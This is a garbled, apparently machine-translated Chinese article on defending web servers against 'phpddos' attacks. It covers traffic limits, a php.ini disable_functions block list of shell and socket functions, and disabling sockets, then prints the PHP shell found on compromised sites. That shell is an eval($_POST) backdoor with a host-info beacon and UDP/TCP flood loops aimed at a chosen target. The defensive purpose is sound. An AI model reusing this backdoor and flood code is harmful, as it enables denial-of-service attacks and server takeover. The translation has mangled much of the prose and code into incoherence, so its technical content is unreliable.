点评:首先,了解什么是phpddos流量攻击。phpddos是黑客入侵
网站服务器后植入phpshell,从而
控制phpshell,发送UDP攻击包的其他受害者或他们的服务器,并阻止DDoS攻击。
这种攻击有一个最大的特点是
上传即时流量增加,通常流量高达数十或数百米,服务器和
宽带整体橱柜挡住了,网站无法
运行,而这样的攻击,我们可以从一个远程
处理,但phpshell运行,你的宽带被完全占领,
无法连接远程。
进攻后做只要接触室的
工作人员,让他为你把你的IIS服务器,
检查无明显的网站被入侵尽可能,网站将无法打开,以免攻击,如果攻击,不是说了国际
空间站,这是种攻击,并根据更准确的观点,肯定有什么问题,打开360安全卫士,然后打开
功能的Daquan,在里面找到流量的防火墙,在这里你可以看到上传
下载流量和每一个过程中,注重服务体系也指出隐藏打开看看,通常上传大是phpddos攻击,共同将在W3WP.exe和mysql.exe上传较大,最小M,成百上千的最大G,了解attacknow,我们考虑如何处理它。
治疗
方法:
1。360流量防火墙的应用,mysql.exe W3WP.exe和上传流量限制,根据你的服务器本身在宽带停止限制,在200mdash普通极限;300kb不那么害怕的问题是什么,的PHPShell大流量攻击,但是这种方法有一个缺点,就是当你重新
启动服务器。当你限制W3WP.exe和mysql.exe不会工作,限制,这样的朋友一定要注意这一点。
2。改变PHP运行环境后,打开php.ini disable_functions =
发现这个,然后放回gzinflate,passthru,exec
系统,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,DL,pfsockopen,OPENLOG,syslog,读符号链接的值,符号链接,popepassthru,stream_socket_server fsocket,fsockopen.allow_url_fopen =
关闭,然后找到
扩展= php_sockets.dll项目,并在前面加上分号,这是
保护这项。
3,寻找攻击的源头,我们可以发现在所有网站phpshell攻击源代码。源代码是(因为代码太乱,无法在
图片中
显示)。
复制代码代码如下所示:
< PHP
eval($ _post { chr(90)));
(86400)set_time_limit;
ignore_user_abort(真的);
$包=0;
HTTP _get美元美元= { 'http' };
兰德= { 'exit美元美元_get};
exec_time美元=美元_get {时间};
如果(StrLen($ HTTP)= = 0或StrLen($兰特)= = 0或StrLen($ exec_time)= = 0)
{
如果(StrLen($ _get { 'rat ' })> 0)
{
echo $ _get { 'rat},{_server美元http_host 。|。gethostbyname($ _server { 'server_name})。| (。php_uname)| 。_server美元{ 'server_software'} { } 'rat _get美元;
出口;
}
PHP 2012终止符;
出口;
}
($ i = 0;$ i < 65535;$ + +)
{
$ = x ;
}
/ / udp1 fsockopen udp2 pfsockopen TCP3 cc.center
max_time美元(美元)=时间+ exec_time;
如果($ = 53)
(1)
{
数据包+ +;
如果(时间()> max_time美元)
{
打破;
}
$ FP = fsockopen(UDP: / / $ http
如果(FP)
{
fwrite(FP美元,美元);
Fclose($ FP);
}
}
其他的
如果($ = 500)
(1)
{
数据包+ +;
如果(时间()> max_time美元){
打破;
}
FP = pfsockopen美元(UDP: / / $ http
如果(FP)
{
fwrite(FP美元,美元);
Fclose($ FP);
}
}
其他的
(1)
{
数据包+ +;
如果(时间()> max_time美元){
打破;
}
FP = pfsockopen美元(TCP / /:$ http
如果(FP)
{
fwrite(FP美元,美元);
Fclose($ FP);
}
}
>
经过批量
搜索,你是否有类似的源代码在网站上,找到后,
删除它,并
设置网站的
权限不写,以便它不会被植入特洛伊木马之前,它是修复。